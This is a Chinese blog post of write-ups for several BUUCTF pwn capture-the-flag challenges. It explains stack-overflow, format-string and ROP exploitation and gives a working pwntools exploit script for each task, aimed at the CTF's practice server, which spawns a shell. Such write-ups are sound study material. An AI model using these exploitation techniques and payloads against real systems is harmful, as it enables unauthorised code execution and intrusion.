BUUCTF[PWN]

最新推荐文章于 2024-05-21 13:23:22 发布
最新推荐文章于 2024-05-21 13:23:22 发布
阅读量1.1k 收藏 16
点赞数 37
分类专栏: pwn 文章标签: ctfer pwn 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/138730321
版权

BUUCTF[PWN]

题目:warmup_csaw_2016

  1. 地址:warmup_csaw_2016
  2. ida打开,进main函数:image-20240507204853587
  3. gets函数的栈溢出:给出了sub_40060D函数的地址image-20240507204928362
  4. 直接,溢出到sub_40060D的地址即可:
from pwn import *
 
p = remote('node5.buuoj.cn',28462)
payload = b'a'*(64+8)+p64(0x40060d)
p.sendline(payload)
p.interactive()

题目:pwn1_sctf_2016

  1. 地址:pwn1_sctf_2016
  2. ida打开进入vuln函数:image-20240507213015640
  3. 先找后门函数:get_flagimage-20240507213041278
  4. 虽然说有fgets函数,但是限制了长度为32,但是看栈中 返回地址距离 s有 0x3c+4 ,不足以溢出到返回值:image-20240507213231797
  5. 重新来看一下vuln函数的逻辑找突破口:可以将输入的 I 替换 为 you ,相当于将一位变成了三位,再计算一下 0x3c+4=3*21+1 ,所以我们要输入21个I外加另外任意一个字符,即可再字符串替换后溢出到返回值的位置。image-20240507213936907
  6. 攻击脚本如下:image-20240507214247106
from pwn import *
 
p = remote('node5.buuoj.cn',25670)

payload = b'I'*(21)+b'a'+p64(0x8048F0D)
p.sendline(payload)
p.interactive()

题目:jarvisoj_level0

  1. 地址:jarvisoj_level0
  2. 依旧ida打开,进入到vulnerable_function函数:buf只有128,但是输入有0x200,必有溢出。image-20240507214757431
  3. 找到后门函数:callsystemimage-20240507214845844
  4. 栈中的偏移为 128+8image-20240507214927684
  5. 解题脚本:image-20240507215000428
from pwn import *
 
p = remote('node5.buuoj.cn',27519)

payload = b'I'*(128+8)+p64(0x400596)
p.sendline(payload)
p.interactive()

题目:get_started_3dsctf_2016

  1. 进main函数:程序提供了后门溢出函数gets,距离返回值只有56。image-20240510222953507

image-20240510223005248

  1. 看后门函数get_flag:对输入进行一个判断,在栈上可以看到数据的位置,在栈溢出时可以直接写道栈上。image-20240510223042459

image-20240510223104704

  1. 脚本如下:
from pwn import *
 
p = remote('node5.buuoj.cn',27248)

door=0x80489A0
return_exit=0x804E6A0

payload = b'a'*(56)+p32(door)+p32(return_exit)+p32(0x308CD64F)+p32(0x195719D1)

	
p.sendline(payload)
p.interactive()
  1. 题目中get_flag函数退出时需要提供一个 合适的返回值 (exit函数的地址),保证程序正常退出,否则get_flag函数无法正常退出,输入在使用putchar输入在 缓存区中的flag 会因为程序的异常崩溃无法输出到终端上。

image-20240510223710607

bjdctf_2020_babystack

  1. 进入main函数:简单的栈溢出,让我们输入数据的长度,当然越大越好。image-20240510231719408
  2. 再看一眼main的栈,和后门函数:image-20240510231809938

image-20240510231923575

  1. 攻击脚本:
from pwn import *
 
p = remote('node5.buuoj.cn',27064)

p.recvuntil(b"[+]Please input the length of your name:")
p.sendline(b'50')

door=0x4006E6

p.recvuntil(b"What's u name?")

payload = b'a'*(12+12)+p64(door+1)

	
p.sendline(payload)
p.interactive()

[第五空间2019 决赛]PWN5

  1. 进入main函数:read函数指定了读取的大小,无法进行栈溢出,但是观察到 printf(buf),存在格式化字符串漏洞。image-20240511105854807
  2. 利用格式化字符串可以阿将 dword_804C044处的值进行修改,改为我们想要的输入的值,来达到使if条件判断通过的目的,dword_804C044的地址为 0804C044 ,使用%n修改指定地址处的值时,需要确定我们写入数据的偏移,这样使用%n才能指定到相应的地址。

  • 先使用 **AAAA%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p **来显示输入的数据的偏移:image-20240511110633456

  • 可以看到输入的字符串偏移为 10,所以输入地址0804C044后需要将栈中偏移为10的数值(0804C044)所指向的地址处的值进行修改。

  • 脚本如下,最后输入的passwd会进入atoi函数,这函数将 字符串转 化为对应的 数字image-20240511111115233

    from pwn import *

p = remote('node5.buuoj.cn',27105)
p.recvuntil(b"your name:")

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)+b'%10$n%11$n%12$n%13$n'
p.sendline(payload)

p.recvuntil(b"your passwd:")

payload = str(0x10101010)
p.sendline(payload.encode())
p.interactive()

    image-20240511111140609

[HarekazeCTF2019]baby_rop

  1. checksec检查后,时64位程序,ida打开进入main函数: __isoc99_scanf函数使用 %s,存在栈溢出 。image-20240511210554361
  2. 没有现成的system(“/bin/sh”),需要手动构造:存在 system函数/bin/sh 字符串,直接使用system给其传参即可,但是注意这是64位的程序, 前6个参数传递依靠寄存器。image-20240511210719114

image-20240511210730969

image-20240511210933208

  1. system函数需要一个参数,直接使用rdi进行传参,但是栈溢出的main函数只有一个ret,所以需要找到程序中的 pop rdi;ret指令的地址,直接使用 **ROPgadget --binary babyrop --only “pop|ret”**指令查找程序中可能出现的指令组合:image-20240511211205218

  2. 可以看到在 0x400683指令处存在 pop rdi ; ret组合(即先执行pop rdi 再执行ret),这使得可以继续改变rip的值,跳转到后门函数system的地址处。

  3. 脚本如下:

    from pwn import *
 
p = remote('node5.buuoj.cn',29873)
#p.recvuntil(b"What's your name?")
sh_addr=0x601048
rdi_addr=0x400683
door=0x400490
ret=0x400479
payload = b'a'*(16+8)+p64(rdi_addr)+p64(sh_addr)+p64(door)	
p.sendline(payload)
p.interactive()

  4. 拿到shell后没有看到flag,使用 find -name flag 查找flag文件的路径,再显示:image-20240511211648974

  5. 拿到shell后没有看到flag,使用 find -name flag 查找flag文件的路径,再显示:[外链图片转存中…(img-NLt6ELLi-1715433475139)]

  6. 币了吧@~@

波克比QWQ
关注
  • 37
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF pwn
L0g1c的博客
01-30 1546
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2373
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4732
BUU CTF PWN 入门知识详解
BUUCTF PWN(2)
qq_60794823的博客
09-28 176
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1249
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
buuctf pwn解题
2301_80477504的博客
02-01 420
1.
BUUCTF Pwn rip
weixin_41557838的博客
05-27 310
BUUCTF Pwn rip
BUUCTF PWN(1)
qq_60794823的博客
09-27 982
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload:‘a’ * 0x23 + p64(0x401186)发现连接超时。
BUUCTF pwn1_sctf_2016
m0_54262894的博客
10-27 174
拿到文件先checksec,32位的文件,并且只开启了NX保护 查看main函数 没有什么东西,双击进入vuln() 通过代码可以知道我们输入的I都会被replace函数替换为you 而且s的长度为0x3c,也就是60个字节,可我们最多能够输入32个字符 所以需要输入20个I来填充0x3c这个长度 紧接着又发现了让人开心的东西 在函数列表里面有一个get_flag函数,打开它会发现cat flag.txt命令 并且我们记下他的地...
BUUCTF Pwn warmup
MrTreebook的博客
12-05 190
BUUCTF Pwn warmup1.题目下载地址2.checksec检查保护3.IDA静态分析4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是warmup 3.IDA静态分析 __int64 __fastcall main(int a1, char **a2, char **a3) { char s[64]; // [rsp+0h] [rbp-80h] BYREF char v5[64]; // [rsp+40h] [rbp-40h] BYREF
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
Linux知识点笔记
exercise_smile的博客
05-16 923
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
【加密与解密(第四版)】第四章笔记
最新发布
m0_58213960的博客
05-21 648
x64系统通用寄存器的名称,第1个字母从“E”改为“R”(例如“RAX”),大小扩展到 64 位,数量增加了8个(R8~R15),扩充了8个128位XMM寄存器(在64位程序中,XMM寄存器经常被用来优化代码)。64位寄存器与x86下的32位寄存器兼容,例如RAX(64位)EAX(低32)、AX(低16位)、AL(低8位)和AH(8~15位)。x64新扩展的寄存器高低位访问,使用WORD、BYTE、DWORD后级,例如R8(64位)R8D(低32位)、R8W(低16位)和R8B(低8位)。
k8s笔记 | helm包管理
weixin_41104307的博客
05-19 453
如果是在 arm64下的话,使用 registry.cn-beijing.aliyuncs.com/pylixm/nfs-subdir-external-provisioner:v4.0.0 这个镜像会报错 exec / nfs-subdir-external-provisioner format error 简单来说就是平台不匹配,解决方案就是自己构建一个匹配的镜像包。由于需要提前创建storageClass manage-nfc-storage,在前面的章节中总共有三个文件。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
小易不止于搬砖的博客
05-17 844
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
buuctf pwn
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值